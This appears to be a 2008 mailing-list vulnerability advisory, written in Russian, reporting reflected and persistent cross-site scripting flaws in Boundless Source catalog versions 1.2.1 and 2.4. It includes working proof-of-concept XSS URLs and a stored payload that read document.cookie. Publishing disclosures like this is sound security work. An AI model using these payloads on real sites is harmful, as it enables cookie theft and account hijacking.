Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PhPress-0.3.0  Read All Sql Information For Config

C4 Security Advisory - GE Fanuc Proficy Information Portal 2.6 Authentication Vulnerability

C4 Security Advisory - GE Fanuc Proficy Information Portal 2.6 Arbitrary File Upload and Execution

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	27.01.2008
Subject:	Vulnerabilities in Boundless Source

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в Boundless Source.

XSS:

http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.
cookie)%3C/script%3E&sparam=all&category=cat20

http://site/catalog/add-lnk.
cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/catalog/add-lnk.
cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/catalog/admin.
cgi?cmd=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

XSS (Persistent):

POST запрос на странице http://site/catalog/add-lnk.cgi?cmd=showform

<BODY onload=alert(document.cookie)
В полях: Название ресурса, URL, Регион, Описание сайта.

Уязвимы версии Boundless Source 1.2.1 (бесплатная) и 2.4 (коммерческая) и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1776/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua